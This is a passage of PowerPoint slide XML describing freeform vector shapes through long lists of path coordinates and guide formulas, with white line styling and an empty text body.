                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2225" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2228" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2228" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2224" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2214" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2210" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2207" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2208" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2210" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2214" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2220" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2225" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2223" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2224" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2230" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2228" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2227" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2228" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2233" y="825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2235" y="824"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2244" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2247" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2249" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2252" y="830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2256" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2257" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2260" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2265" y="816"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2270" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="810"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2277" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2273" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2274" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2278" y="825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2288" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2291" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2301" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2309" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2317" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2324" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2329" y="810"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2330" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2332" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2336" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2339" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2342" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2342" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2343" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2346" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2355" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2357" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2369" y="792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2371" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2377" y="779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2384" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2387" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2391" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2393" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2400" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2405" y="764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2406" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2410" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2411" y="758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2420" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2441" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2442" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2446" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2448" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2451" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2451" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2453" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2459" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2469" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2472" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2476" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2481" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2484" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2484" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2485" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2479" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2481" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2480" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2476" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2473" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2470" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2466" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2471" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2471" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2469" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2461" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2464" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2457" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2452" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2450" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2450" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2447" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2445" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2440" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2433" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2431" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2435" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2432" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2435" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2438" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2444" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2451" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2449" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2452" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2454" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2455" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2462" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2464" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2472" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2476" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2481" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2485" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2493" y="649"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2497" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2498" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2503" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2506" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2512" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2516" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2517" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2517" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2525" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2534" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2540" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2546" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2549" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2555" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2558" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2556" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2558" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2560" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2568" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2570" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2582" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2584" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2592" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2595" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2602" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2603" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2600" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2601" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2607" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2612" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2613" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2612" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2610" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2606" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2604" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2603" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2608" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2616" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2623" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2631" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2628" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2625" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2624" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2635" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2640" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2643" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2650" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2652" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2652" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2649" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2645" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2643" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2631" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2626" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2620" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2613" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2606" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2601" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2597" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2590" y="560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2583" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2583" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2582" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2587" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2587" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2585" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2585" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2578" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2571" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2573" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2570" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2567" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2566" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2565" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2558" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2531" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2525" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2513" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2493" y="488"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="0" y="983"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="983"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="2239" y="823"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2237" y="826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="823"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="1493" y="1099"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1493" y="1099"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36279" name="Freeform 11"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5380" y="3527"/>
                <a:ext cx="193" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 144 w 193"/>
                  <a:gd name="T1" fmla="*/ 49 h 255"/>
                  <a:gd name="T2" fmla="*/ 152 w 193"/>
                  <a:gd name="T3" fmla="*/ 55 h 255"/>
                  <a:gd name="T4" fmla="*/ 173 w 193"/>
                  <a:gd name="T5" fmla="*/ 73 h 255"/>
                  <a:gd name="T6" fmla="*/ 190 w 193"/>
                  <a:gd name="T7" fmla="*/ 65 h 255"/>
                  <a:gd name="T8" fmla="*/ 190 w 193"/>
                  <a:gd name="T9" fmla="*/ 84 h 255"/>
                  <a:gd name="T10" fmla="*/ 181 w 193"/>
                  <a:gd name="T11" fmla="*/ 92 h 255"/>
                  <a:gd name="T12" fmla="*/ 168 w 193"/>
                  <a:gd name="T13" fmla="*/ 97 h 255"/>
                  <a:gd name="T14" fmla="*/ 169 w 193"/>
                  <a:gd name="T15" fmla="*/ 110 h 255"/>
                  <a:gd name="T16" fmla="*/ 146 w 193"/>
                  <a:gd name="T17" fmla="*/ 140 h 255"/>
                  <a:gd name="T18" fmla="*/ 134 w 193"/>
                  <a:gd name="T19" fmla="*/ 136 h 255"/>
                  <a:gd name="T20" fmla="*/ 142 w 193"/>
                  <a:gd name="T21" fmla="*/ 118 h 255"/>
                  <a:gd name="T22" fmla="*/ 131 w 193"/>
                  <a:gd name="T23" fmla="*/ 107 h 255"/>
                  <a:gd name="T24" fmla="*/ 117 w 193"/>
                  <a:gd name="T25" fmla="*/ 97 h 255"/>
                  <a:gd name="T26" fmla="*/ 132 w 193"/>
                  <a:gd name="T27" fmla="*/ 83 h 255"/>
                  <a:gd name="T28" fmla="*/ 135 w 193"/>
                  <a:gd name="T29" fmla="*/ 67 h 255"/>
                  <a:gd name="T30" fmla="*/ 128 w 193"/>
                  <a:gd name="T31" fmla="*/ 45 h 255"/>
                  <a:gd name="T32" fmla="*/ 121 w 193"/>
                  <a:gd name="T33" fmla="*/ 32 h 255"/>
                  <a:gd name="T34" fmla="*/ 121 w 193"/>
                  <a:gd name="T35" fmla="*/ 36 h 255"/>
                  <a:gd name="T36" fmla="*/ 115 w 193"/>
                  <a:gd name="T37" fmla="*/ 29 h 255"/>
                  <a:gd name="T38" fmla="*/ 105 w 193"/>
                  <a:gd name="T39" fmla="*/ 14 h 255"/>
                  <a:gd name="T40" fmla="*/ 103 w 193"/>
                  <a:gd name="T41" fmla="*/ 6 h 255"/>
                  <a:gd name="T42" fmla="*/ 101 w 193"/>
                  <a:gd name="T43" fmla="*/ 1 h 255"/>
                  <a:gd name="T44" fmla="*/ 104 w 193"/>
                  <a:gd name="T45" fmla="*/ 4 h 255"/>
                  <a:gd name="T46" fmla="*/ 109 w 193"/>
                  <a:gd name="T47" fmla="*/ 10 h 255"/>
                  <a:gd name="T48" fmla="*/ 118 w 193"/>
                  <a:gd name="T49" fmla="*/ 13 h 255"/>
                  <a:gd name="T50" fmla="*/ 122 w 193"/>
                  <a:gd name="T51" fmla="*/ 17 h 255"/>
                  <a:gd name="T52" fmla="*/ 126 w 193"/>
                  <a:gd name="T53" fmla="*/ 20 h 255"/>
                  <a:gd name="T54" fmla="*/ 128 w 193"/>
                  <a:gd name="T55" fmla="*/ 26 h 255"/>
                  <a:gd name="T56" fmla="*/ 126 w 193"/>
                  <a:gd name="T57" fmla="*/ 28 h 255"/>
                  <a:gd name="T58" fmla="*/ 133 w 193"/>
                  <a:gd name="T59" fmla="*/ 36 h 255"/>
                  <a:gd name="T60" fmla="*/ 134 w 193"/>
                  <a:gd name="T61" fmla="*/ 42 h 255"/>
                  <a:gd name="T62" fmla="*/ 130 w 193"/>
                  <a:gd name="T63" fmla="*/ 43 h 255"/>
                  <a:gd name="T64" fmla="*/ 134 w 193"/>
                  <a:gd name="T65" fmla="*/ 49 h 255"/>
                  <a:gd name="T66" fmla="*/ 141 w 193"/>
                  <a:gd name="T67" fmla="*/ 51 h 255"/>
                  <a:gd name="T68" fmla="*/ 141 w 193"/>
                  <a:gd name="T69" fmla="*/ 54 h 255"/>
                  <a:gd name="T70" fmla="*/ 82 w 193"/>
                  <a:gd name="T71" fmla="*/ 198 h 255"/>
                  <a:gd name="T72" fmla="*/ 72 w 193"/>
                  <a:gd name="T73" fmla="*/ 200 h 255"/>
                  <a:gd name="T74" fmla="*/ 76 w 193"/>
                  <a:gd name="T75" fmla="*/ 210 h 255"/>
                  <a:gd name="T76" fmla="*/ 70 w 193"/>
                  <a:gd name="T77" fmla="*/ 215 h 255"/>
                  <a:gd name="T78" fmla="*/ 66 w 193"/>
                  <a:gd name="T79" fmla="*/ 237 h 255"/>
                  <a:gd name="T80" fmla="*/ 55 w 193"/>
                  <a:gd name="T81" fmla="*/ 248 h 255"/>
                  <a:gd name="T82" fmla="*/ 36 w 193"/>
                  <a:gd name="T83" fmla="*/ 252 h 255"/>
                  <a:gd name="T84" fmla="*/ 19 w 193"/>
                  <a:gd name="T85" fmla="*/ 246 h 255"/>
                  <a:gd name="T86" fmla="*/ 12 w 193"/>
                  <a:gd name="T87" fmla="*/ 245 h 255"/>
                  <a:gd name="T88" fmla="*/ 0 w 193"/>
                  <a:gd name="T89" fmla="*/ 241 h 255"/>
                  <a:gd name="T90" fmla="*/ 6 w 193"/>
                  <a:gd name="T91" fmla="*/ 236 h 255"/>
                  <a:gd name="T92" fmla="*/ 6 w 193"/>
                  <a:gd name="T93" fmla="*/ 227 h 255"/>
                  <a:gd name="T94" fmla="*/ 11 w 193"/>
                  <a:gd name="T95" fmla="*/ 223 h 255"/>
                  <a:gd name="T96" fmla="*/ 19 w 193"/>
                  <a:gd name="T97" fmla="*/ 211 h 255"/>
                  <a:gd name="T98" fmla="*/ 39 w 193"/>
                  <a:gd name="T99" fmla="*/ 196 h 255"/>
                  <a:gd name="T100" fmla="*/ 56 w 193"/>
                  <a:gd name="T101" fmla="*/ 183 h 255"/>
                  <a:gd name="T102" fmla="*/ 68 w 193"/>
                  <a:gd name="T103" fmla="*/ 174 h 255"/>
                  <a:gd name="T104" fmla="*/ 76 w 193"/>
                  <a:gd name="T105" fmla="*/ 165 h 255"/>
                  <a:gd name="T106" fmla="*/ 80 w 193"/>
                  <a:gd name="T107" fmla="*/ 151 h 255"/>
                  <a:gd name="T108" fmla="*/ 90 w 193"/>
                  <a:gd name="T109" fmla="*/ 144 h 255"/>
                  <a:gd name="T110" fmla="*/ 98 w 193"/>
                  <a:gd name="T111" fmla="*/ 125 h 255"/>
                  <a:gd name="T112" fmla="*/ 104 w 193"/>
                  <a:gd name="T113" fmla="*/ 131 h 255"/>
                  <a:gd name="T114" fmla="*/ 118 w 193"/>
                  <a:gd name="T115" fmla="*/ 135 h 255"/>
                  <a:gd name="T116" fmla="*/ 123 w 193"/>
                  <a:gd name="T117" fmla="*/ 148 h 255"/>
                  <a:gd name="T118" fmla="*/ 114 w 193"/>
                  <a:gd name="T119" fmla="*/ 165 h 255"/>
                  <a:gd name="T120" fmla="*/ 100 w 193"/>
                  <a:gd name="T121" fmla="*/ 179 h 255"/>
                  <a:gd name="T122" fmla="*/ 101 w 193"/>
                  <a:gd name="T123" fmla="*/ 188 h 255"/>
                  <a:gd name="T124" fmla="*/ 95 w 193"/>
                  <a:gd name="T125" fmla="*/ 189 h 255"/>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93"/>
                  <a:gd name="T190" fmla="*/ 0 h 255"/>
                  <a:gd name="T191" fmla="*/ 193 w 193"/>
                  <a:gd name="T192" fmla="*/ 255 h 255"/>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93" h="255">
                    <a:moveTo>
                      <a:pt x="141" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="146" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
